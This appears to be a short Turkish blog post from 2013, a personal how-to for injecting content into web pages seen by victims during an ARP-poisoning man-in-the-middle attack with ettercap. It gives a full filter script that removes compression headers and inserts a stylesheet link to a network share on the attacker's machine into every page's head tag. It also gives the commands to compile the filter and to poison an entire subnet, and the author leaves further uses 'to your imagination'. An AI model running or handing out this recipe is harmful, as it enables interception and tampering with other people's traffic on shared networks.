14 Eylül 2013 Cumartesi

Ettercap ile HTTP Trafiğinde Bul Değiştir

Mitm gibi ağ trafiğini araya girerek izlemeye başladığınız durumlarda ettercap aracını kullanarak trafiği değiştirmeniz mümkün olabilir. Tabii benim gibi her lazım olduğunda "bunu nasıl yapıyorduk" diye söylenmiyorsanız..  Bu sefer üşenmiyorum buraya yazıyorum ve bir sonraki lazım oluşunda burada bulmayı umut ediyorum :)

Trafiğini üzerimize aldığımız istemcinin ziyaret ettiği web sayfasında küçük bir değişiklik yapmak istediğimizi varsayalım. Ben sayfaya yeni bir css bağlantısı eklemek istiyorum.. :) Bunun için şöyle bir filtre dosyası hazırlayalım...

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
      msg("zapped Accept-Encoding!\n");
   }
}

if (ip.proto == TCP && tcp.dst == 80) {
 if (search(DATA.data, "gzip")) {
  replace("gzip", " ");
  msg("whited out gzip\n");
 }
}

if (ip.proto == TCP && tcp.dst == 80) {
 if (search(DATA.data, "deflate")) {
  replace("deflate", " "); 
  msg("whited out deflate\n");
 }
}

if (ip.proto == TCP && tcp.src == 80) {
   replace("<head>", "<head><link rel=\"stylesheet\" href=\"\\\\192.168.1.102\\share\\style.css\" type=\"text/css\" media=\"all\">");
   replace("<HEAD>", "<HEAD><link rel=\"stylesheet\" href=\"\\\\192.168.1.102\\share\\style.css\" type=\"text/css\" media=\"all\">");
   msg("Filter Ran.\n");
}
 

Bu dosya web sayfası içeriğindeki <head> etiketini değiştirip sayfaya yeni bir css dosyası linki ekleyecektir... Ben css ekledim :) Gerisi hayal gücünüze kalmış...

Bu dosyayı /usr/local/share/ettercap/etter.html_change.filter adıyla kayıt edelim... Yazdığımız filter dosyasının ettercap tarafından kullanılabilemesi için aşağıdaki gibi bir komut verelim...

etterfilter etter.html_change.filter -o etter.html_change.filter


Bu aşamadan sonra aşağıdaki komutla ettercap'i ateşleyelim ve mitm saldırımızı başlatalım...

ettercap -i eth0 -T -q -F etter.html_change -M ARP // //


Zehirlenen ve trafiği üzerimizden geçmeye başlayan istemcilerin bizim bul/değiştir kuralımıza uygun şekilde değiştirilmiş web sayfalarını görmeleri gerekiyor....